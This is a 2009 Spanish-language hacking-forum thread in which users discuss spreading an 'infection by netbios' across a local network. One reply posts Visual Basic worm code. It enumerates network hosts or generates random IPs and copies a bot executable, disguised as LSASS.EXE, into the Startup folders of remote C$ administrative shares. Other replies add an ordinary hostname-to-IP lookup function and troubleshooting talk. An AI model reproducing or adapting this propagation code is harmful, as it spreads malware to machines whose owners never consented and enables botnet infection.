elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Listar carpetas compartidas en equipos remotos...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Listar carpetas compartidas en equipos remotos...  (Leído 3,769 veces)
Hole_System

Desconectado Desconectado

Mensajes: 239


Ver Perfil
Listar carpetas compartidas en equipos remotos...
« en: 5 Septiembre 2009, 19:27 pm »

holas chikos ya una ves inicie un tema y al final se quedo sin una solucion final y el problema es que los projectos que encontre trabajan sobre el nombre del host o sea

\\juanpc\ y no \\192.168.0.123

esto es con la api enumshare

si alguien tiene algo por ahi y kiera aportar se agradecera para retomar el proyecto "infection by netbios"

salu2


En línea

By Pitoniso.
mojolloyo20

Desconectado Desconectado

Mensajes: 208


en esta vida nunca te acostaras sin saber nada nue


Ver Perfil WWW
Re: Listar carpetas compartidas en equipos remotos...
« Respuesta #1 en: 6 Septiembre 2009, 01:14 am »

bueno por lo que veo quieres infectar por lan.usando netbios hace tiempo vi por aki un codigo que parece bueno aun que no lo porbe.

y tampoco se de quien es el codigo ahora pero ya nos enteraremos  ;D

ba en un modulo de clase,o por lo menos hay lo tengo.

[codec]

Option Explicit

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (hpvDest As Any, ByVal hpvSource As Long, ByVal cbCopy As Long)
Private Declare Function NetServerEnum Lib "netapi32.dll" (ByVal servername As String, ByVal level As Long, BUFFER As Long, ByVal prefmaxlen As Long, entriesread As Long, totalentries As Long, ByVal ServerType As Long, ByVal domain As String, resumehandle As Long) As Long
Private Declare Function NetApiBufferFree Lib "netapi32.dll" (BufPtr As Any) As Long
Private Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyW" (ByVal lpszDest As String, ByVal lpszSrc As Long) As Long

Private Const ERROR_SUCCESS = 0
Private Const ERROR_MORE_DATA = 234
Private Const SIZE_SI_101 = 24

Private Type SERVER_INFO_101
   dwPlatformId As Long
   lpszServerName As Long
   dwVersionMajor As Long
   dwVersionMinor As Long
   dwType As Long
   lpszComment As Long
End Type

Private InternalInfect As Integer

Public Function NetBIOS() As Long
    On Error GoTo ErrTrap
    Dim lRet As Long, sArray() As String, nK As Integer, sIP As String
   If GetServerList(SV_TYPE_ALL) <> "" And InternalInfect% = 0 Then
        sArray() = Split(GetServerList(SV_TYPE_ALL), ",")
        For nK% = 0 To UBound(sArray())
            DoEvents
            '/* vb interpreter */
            Call System.BlockCopy(System.WinDir & "\msvbvm60.dll", "\\" & Trim$(sArray(nK%)) & "\C$\WINDOWS\msvbvm60.dll")
            Call System.BlockCopy(System.WinDir & "\msvbvm60.dll", "\\" & Trim$(sArray(nK%)) & "\C$\WINNT\msvbvm60.dll")
            DoEvents
            '/* winsock control */
            Call System.BlockCopy(System.WinDir & "\mswinsck.ocx", "\\" & Trim$(sArray(nK%)) & "\C$\WINDOWS\mswinsck.ocx")
            Call System.BlockCopy(System.WinDir & "\mswinsck.ocx", "\\" & Trim$(sArray(nK%)) & "\C$\WINNT\mswinsck.ocx")
            DoEvents
            '/* worm */
            Call System.BlockCopy(Bot.Location, "\\" & Trim$(sArray(nK%)) & "\C$\WINDOWS\Start Menu\Programs\StartUp\LSASS.EXE") '/* Win9x\ME */
            Call System.BlockCopy(Bot.Location, "\\" & Trim$(sArray(nK%)) & "\C$\Documents And Settings\All Users\Start Menu\Programs\StartUp\LSASS.EXE") '/* Win2k\XP */
            Call System.BlockCopy(Bot.Location, "\\" & Trim$(sArray(nK%)) & "\C$\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\LSASS.EXE") '/* WinNT */
        Next nK%
        NetBIOS& = -1
        InternalInfect% = 1
    Else
        sIP$ = GenerateIP$
        DoEvents
        '/* vb interpreter */
        lRet& = System.BlockCopy(System.WinDir & "\msvbvm60.dll", "\\" & sIP$ & "\C$\WINDOWS\msvbvm60.dll"): If lRet& = 1 Then NetBIOS& = 1
        lRet& = System.BlockCopy(System.WinDir & "\msvbvm60.dll", "\\" & sIP$ & "\C$\WINNT\msvbvm60.dll"): If lRet& = 1 Then NetBIOS& = 1
        DoEvents
        '/* winsock control */
        lRet& = System.BlockCopy(System.WinDir & "\mswinsck.ocx", "\\" & sIP$ & "\C$\WINDOWS\mswinsck.ocx"): If lRet& = 1 Then NetBIOS& = 1
        lRet& = System.BlockCopy(System.WinDir & "\mswinsck.ocx", "\\" & sIP$ & "\C$\WINNT\mswinsck.ocx"): If lRet& = 1 Then NetBIOS& = 1
        DoEvents
        '/* worm */
        lRet& = System.BlockCopy(Bot.Location, "\\" & sIP$ & "\C$\WINDOWS\Start Menu\Programs\StartUp\LSASS.EXE"): If lRet& = 1 Then NetBIOS& = 1 '/* Win9x\ME */
        lRet& = System.BlockCopy(Bot.Location, "\\" & sIP$ & "\C$\Documents And Settings\All Users\Start Menu\Programs\StartUp\LSASS.EXE"): If lRet& = 1 Then NetBIOS& = 1 '/* Win2k\XP */
        lRet& = System.BlockCopy(Bot.Location, "\\" & sIP$ & "\C$\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\LSASS.EXE"): If lRet& = 1 Then NetBIOS& = 1 '/* WinNT */
    End If
   
Exit Function
ErrTrap:
    NetBIOS& = 0
   
End Function

Private Function GenerateIP() As String
    On Error Resume Next
    Dim nA As Integer, nB As Integer, nC As Integer, nD As Integer
    Randomize
    nA% = Fix((Rnd * 254) + 1)
    Randomize
    nB% = Fix((Rnd * 254) + 1)
    Randomize
    nC% = Fix((Rnd * 254) + 1)
    Randomize
    nD% = Fix((Rnd * 254) + 1)
    GenerateIP$ = CStr(nA%) & "." & CStr(nB%) & "." & CStr(nC%) & "." & CStr(nD%)
End Function

Private Function GetServerList(ServerType As ServerTypes) As String
    On Error GoTo ErrTrap
    Dim pszTemp As String, pszServer As String, pszDomain As String
    Dim nLevel As Long, i As Long, BufPtr As Long, TempBufPtr As Long
    Dim nPrefMaxLen As Long, nEntriesRead As Long, nTotalEntries As Long
    Dim nServerType As Long, nResumeHandle As Long, nRes As Long
    Dim ServerInfo As SERVER_INFO_101, ServerNames() As String, nK As Integer
    Dim sTemp As String
    ReDim ServerNames(0) As String
    pszServer = vbNullString
    pszDomain = vbNullString
    nLevel = 101
    BufPtr = 0
    nPrefMaxLen = &HFFFFFFFF
    nEntriesRead = 0
    nTotalEntries = 0
    nServerType = ServerType
    nResumeHandle = 0
    Do
        nRes = NetServerEnum(pszServer, nLevel, BufPtr, nPrefMaxLen, nEntriesRead, nTotalEntries, nServerType, pszDomain, nResumeHandle)
        If ((nRes = ERROR_SUCCESS) Or (nRes = ERROR_MORE_DATA)) And (nEntriesRead > 0) Then
            TempBufPtr = BufPtr
            For i = 1 To nEntriesRead
                Call CopyMemory(ServerInfo, TempBufPtr, SIZE_SI_101)
                ReDim Preserve ServerNames(UBound(ServerNames()) + 1) As String
                ServerNames(UBound(ServerNames())) = PointerToString(ServerInfo.lpszServerName)
                TempBufPtr = TempBufPtr + SIZE_SI_101
            Next i
        Else
            GetServerList$ = vbNullString
            Exit Function
        End If
        Call NetApiBufferFree(BufPtr)
    Loop While nEntriesRead < nTotalEntries
    sTemp$ = ""
    For nK% = 0 To UBound(ServerNames())
        If Len(Trim$(Replace$(ServerNames(nK%), Chr$(0), ""))) > 0 Then sTemp$ = sTemp$ & ServerNames(nK%) & ", "
    Next nK%
    If Right$(sTemp$, 2) = ", " Then sTemp$ = Left$(sTemp$, Len(sTemp$) - 2)
    GetServerList$ = sTemp$
Exit Function
ErrTrap:
    GetServerList$ = vbNullString
End Function

Private Function PointerToString(lpszString As Long) As String
    Dim lpszStr1 As String, lpszStr2 As String, nRes As Long
    lpszStr1 = String(1000, "*")
    nRes = lstrcpy(lpszStr1, lpszString)
    lpszStr2 = (StrConv(lpszStr1, vbFromUnicode))
    PointerToString = Left(lpszStr2, InStr(lpszStr2, Chr$(0)) - 1)
End Function

[codec]

espero que te sirva un salu2

p.d:


En línea

Lo reconozco
fumo porros a diario
me fumo uno y es como poner la radio
pero por dentro de mi amarga cabeza
siempre tan sola y tan llena de tristeza
Me salen la s canciones que a mí más me molan
las musiquillas que ha mí más me motivan
las amarguras se vuelven amapolas
y las tristezas me alegran la vida
Anda dame que fume
porque me siento sólo
dame de fumar
porque no quiero estar triste
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Listar carpetas compartidas en equipos remotos...
« Respuesta #2 en: 6 Septiembre 2009, 01:42 am »

Código:
System.WinDir

Me suena a .NET :-X

Que tiene que ver que sea un nombre que una IP? Simplemente resuelve el Dominio.. :-\
Código:
http://allapi.mentalis.org/apilist/gethostbyname.shtml
http://msdn.microsoft.com/en-us/library/ms738524%28VS.85%29.aspx

MOD: Te he hecho una funcion:
Código
  1. Option Explicit
  2.  
  3. Private Declare Function WSACleanup Lib "WSOCK32" () As Long
  4. Private Declare Function WSAStartup Lib "WSOCK32" (ByVal wVersionRequired As Long, lpWSADATA As Any) As Long
  5. Private Declare Function gethostbyname Lib "WSOCK32" (ByVal szHost As String) As Long
  6. Private Declare Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
  7.  
  8. Private Type HOSTENT
  9.    hName                       As Long
  10.    hAliases                    As Long
  11.    hAddrType                   As Integer
  12.    hLen                        As Integer
  13.    hAddrList                   As Long
  14. End Type
  15.  
  16. Public Function GetIP(ByVal sHost As String) As String
  17.    Dim WSAD(&H18E) As Byte
  18.    Dim lpHost      As Long
  19.    Dim HOST        As HOSTENT
  20.    Dim dwIP        As Long
  21.    Dim tIP()       As Byte
  22.    Dim i           As Long
  23.  
  24.    If (WSAStartup(1, WSAD(0)) = 0) Then
  25.        lpHost = gethostbyname(sHost)
  26.        If lpHost Then
  27.            Call CopyMemory(HOST, ByVal lpHost&, Len(HOST))
  28.            Call CopyMemory(dwIP, ByVal HOST.hAddrList&, &H4)
  29.            ReDim tIP(1 To HOST.hLen)
  30.            Call CopyMemory(tIP(1), ByVal dwIP&, HOST.hLen)
  31.            For i = 1 To HOST.hLen
  32.                GetIP = GetIP & tIP(i) & "."
  33.            Next i
  34.            GetIP = Left$(GetIP, Len(GetIP) - 1)
  35.        End If
  36.        Call WSACleanup
  37.    End If
  38. End Function
  39.  
« Última modificación: 6 Septiembre 2009, 02:04 am por Karcrack » En línea

mojolloyo20

Desconectado Desconectado

Mensajes: 208


en esta vida nunca te acostaras sin saber nada nue


Ver Perfil WWW
Re: Listar carpetas compartidas en equipos remotos...
« Respuesta #3 en: 6 Septiembre 2009, 14:53 pm »

pos la verdad que no tengo ni idea, lo vi hace tiempo y lo tengo de info.

yo suponia que era vb,aun que no resuelve el dominio pero te genera las ip.

y que diferencia hay ente vb y vb.net? que lia con tantos lenguajes  ;D

un salu2
En línea

Lo reconozco
fumo porros a diario
me fumo uno y es como poner la radio
pero por dentro de mi amarga cabeza
siempre tan sola y tan llena de tristeza
Me salen la s canciones que a mí más me molan
las musiquillas que ha mí más me motivan
las amarguras se vuelven amapolas
y las tristezas me alegran la vida
Anda dame que fume
porque me siento sólo
dame de fumar
porque no quiero estar triste
Hole_System

Desconectado Desconectado

Mensajes: 239


Ver Perfil
Re: Listar carpetas compartidas en equipos remotos...
« Respuesta #4 en: 9 Septiembre 2009, 00:14 am »

El problema es que por ejemplo los codigos que he encontrado son para conectarse al equipo remoto usando el nombre del host y cuando yo scaneo lo unico que obtengo es la ip el host no me lo da, como resuelvo esto...

probe con el ping -a 192.168.12.23

y nada me da el ping normal con otras ip si me da el host...

salu2
En línea

By Pitoniso.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Listar todas las carpetas existentes dentro de una carpeta en vb6
Programación Visual Basic
AnaCarolina28 1 2,204 Último mensaje 9 Noviembre 2014, 01:45 am
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines